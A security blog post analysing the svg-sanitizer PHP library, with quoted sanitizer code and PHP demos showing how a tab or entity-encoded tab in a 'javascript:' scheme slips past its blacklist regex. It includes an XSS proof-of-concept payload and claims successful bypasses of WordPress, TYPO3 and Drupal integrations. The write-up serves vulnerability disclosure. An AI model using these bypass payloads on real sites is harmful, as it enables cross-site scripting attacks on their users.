When you copy code, you may get some free bugs along with it!

While working on a PHP project, I needed a function to upload SVG files safely, so I searched Google and found svg-sanitizer (https://github.com/darylldoyle/svg-sanitizer). But is it really safe? Some WordPress plugins and Drupal modules use it, and so does the TYPO3 CMS core. That alone did not convince me.
Analyzing how it sanitizes:

The main sanitize function works as follows:
1. Remove all PHP script tags

$dirty = preg_replace('/<\?(=|php)(.+?)\?>/i', '', $dirty);
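To make step 1 concrete, here is a minimal sketch that applies the pattern quoted above to a made-up input. The sample string and variable names are assumptions for illustration only, not taken from the library's tests.

```php
<?php
// Pattern copied from the article; the input string is a hypothetical sample.
$pattern = '/<\?(=|php)(.+?)\?>/i';

$dirty = '<svg><?php echo 1; ?><rect/><?= $x ?></svg>';

// Both the long-form and the short echo-form PHP tags are stripped.
$clean = preg_replace($pattern, '', $dirty);

echo $clean, PHP_EOL; // prints <svg><rect/></svg>
```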

2. Load the XML and remove any doctype

        $loaded = $this->xmlDocument->loadXML($dirty);

        // If we couldn't parse the XML then we go no further. Reset and return false
        if (!$loaded) {
            return false;
        }
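The early return in step 2 relies on DOMDocument::loadXML() returning false for input that is not well-formed. A small sketch of that behaviour follows; tryLoad() is a hypothetical helper written for this example, not part of svg-sanitizer.

```php
<?php
// Collect libxml parse errors internally instead of emitting PHP warnings.
libxml_use_internal_errors(true);

// Hypothetical helper: reports whether the string parses as XML.
function tryLoad(string $xml): bool
{
    $doc = new DOMDocument();
    return $doc->loadXML($xml);
}

$wellFormed = tryLoad('<svg xmlns="http://www.w3.org/2000/svg"><rect/></svg>');
$malformed  = tryLoad('<svg><rect></svg>'); // <rect> is never closed

var_dump($wellFormed, $malformed); // bool(true), bool(false)
```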


3. Clean the XML tags
3.1 Remove tags that are not on the whitelist
3.2 Clean xlink:href attributes (https://developer.mozilla.org/en-US/docs/Web/SVG/Attribute/xlink:href), which also have a whitelist

    protected function cleanXlinkHrefs(\DOMElement $element)
    {
        $xlinks = $element->getAttributeNS('http://www.w3.org/1999/xlink', 'href');
        if (preg_match(self::SCRIPT_REGEX, $xlinks) === 1) {
            // Only a few image data: URI prefixes are whitelisted
            if (!in_array(substr($xlinks, 0, 14), array(
                'data:image/png', // PNG
                'data:image/gif', // GIF
                'data:image/jpg', // JPG
                'data:image/jpe', // JPEG
                'data:image/pjp', // PJPEG
            ))) {
                $element->removeAttributeNS( 'http://www.w3.org/1999/xlink', 'href' );
            }
        }
    }
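The decision logic of step 3.2 can be tried in isolation. The sketch below copies the regex (quoted further down in this post) and the prefix list into a free function. wouldRemoveXlinkHref() is a hypothetical name used only here, and the sample URLs are made up.

```php
<?php
// Regex as quoted in the article for SCRIPT_REGEX.
const SCRIPT_REGEX = '/(?:\w+script|data):/xi';

// Hypothetical helper mirroring the check in cleanXlinkHrefs():
// returns true when the attribute would be removed.
function wouldRemoveXlinkHref(string $xlinks): bool
{
    if (preg_match(SCRIPT_REGEX, $xlinks) !== 1) {
        return false; // no *script: or data: scheme found, attribute is kept
    }
    $allowedPrefixes = array(
        'data:image/png',
        'data:image/gif',
        'data:image/jpg',
        'data:image/jpe',
        'data:image/pjp',
    );
    // Only the first 14 characters are compared against the whitelist.
    return !in_array(substr($xlinks, 0, 14), $allowedPrefixes, true);
}

var_dump(wouldRemoveXlinkHref('data:image/png;base64,AAAA')); // bool(false)
var_dump(wouldRemoveXlinkHref('data:text/html,<b>x</b>'));    // bool(true)
var_dump(wouldRemoveXlinkHref('javascript:alert(1)'));        // bool(true)
var_dump(wouldRemoveXlinkHref('#gradient'));                  // bool(false)
```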

3.3 Clean href attributes against a blacklist

    protected function cleanHrefs(\DOMElement $element)
    {
        $href = $element->getAttribute('href');
        if (preg_match(self::SCRIPT_REGEX, $href) === 1) {
            // ... (rest of the method is not shown in this excerpt)
        }
    }

where SCRIPT_REGEX is /(?:\w+script|data):/xi

It removes every *script: scheme and the data: scheme, but that is not safe enough: it can be bypassed by putting a whitespace character (\s) inside the URL scheme. Recall the payloads from https://portswigger.net/web-security/cross-site-scripting/cheat-sheet.
The HTML below works in a browser:

<a href='javascript\x09:alert(document.domain)'>
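The weakness of the blacklist can be checked directly: the regex requires the colon to follow "script" immediately, so a tab in between prevents a match. A minimal sketch, with variable names chosen for this example:

```php
<?php
// Regex as quoted in the article for SCRIPT_REGEX.
$scriptRegex = '/(?:\w+script|data):/xi';

$plain   = 'javascript:alert(document.domain)';
$withTab = "javascript\x09:alert(document.domain)"; // \x09 is a literal tab

$plainMatches = preg_match($scriptRegex, $plain);   // scheme is detected
$tabMatches   = preg_match($scriptRegex, $withTab); // tab breaks "script:" adjacency

var_dump($plainMatches, $tabMatches); // int(1), int(0)
```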

But the first sticking point is:
4. Remove all non-printable characters and replace \s with a space
However, entities are allowed and are automatically decoded in a tag's attribute values, like this:

Hmm, but after going through DOMDocument's loadXML it is re-encoded and comes back as:

<a href='javascript:alert(document.domain)'>
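To illustrate the entity decoding mentioned above, here is a sketch showing that the XML parser turns a character reference inside an attribute into the real character before any href check runs. The SVG string is a made-up sample, not the author's payload.

```php
<?php
$doc = new DOMDocument();
// Hypothetical input: the tab is written as the character reference &#x09;
$doc->loadXML(
    '<svg xmlns="http://www.w3.org/2000/svg">'
    . '<a href="javascript&#x09;:alert(document.domain)"/>'
    . '</svg>'
);

$a    = $doc->getElementsByTagName('a')->item(0);
$href = $a->getAttribute('href');

// The parser has already replaced the reference with a real tab character,
// so the blacklist regex from the article no longer matches.
$matches = preg_match('/(?:\w+script|data):/xi', $href);

var_dump($href === "javascript\x09:alert(document.domain)"); // bool(true)
var_dump($matches);                                          // int(0)
```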

So I tried double encoding:

But &#x09; is decoded as &amp;

And this is the second sticking point.
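One plausible reading of this second sticking point is sketched below, under the assumption that the double-encoded form was &amp;#x09; (the original payload is not shown here). The parser decodes only one level, and the serializer then escapes the ampersand again.

```php
<?php
$doc = new DOMDocument();
// Assumed double-encoded input: &amp;#x09; instead of &#x09;
$doc->loadXML('<svg><a href="javascript&amp;#x09;:alert(document.domain)"/></svg>');

$a = $doc->getElementsByTagName('a')->item(0);

// One level of decoding: the attribute now holds the literal text "&#x09;".
$decoded = $a->getAttribute('href');

// On output the ampersand is escaped again, so no real tab ever appears.
$serialized = $doc->saveXML($a);

echo $decoded, PHP_EOL;    // javascript&#x09;:alert(document.domain)
echo $serialized, PHP_EOL;
```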

But by chaining the two sticking points above, I got a payload that bypasses this function:

So I built an SVG that bypasses this library:

Tested against the Safe SVG plugin 1.9.4 for WordPress:

And TYPO3 10 LTS:

And some Drupal modules (svg_sanitizer, svg_upload_sanitizer, …)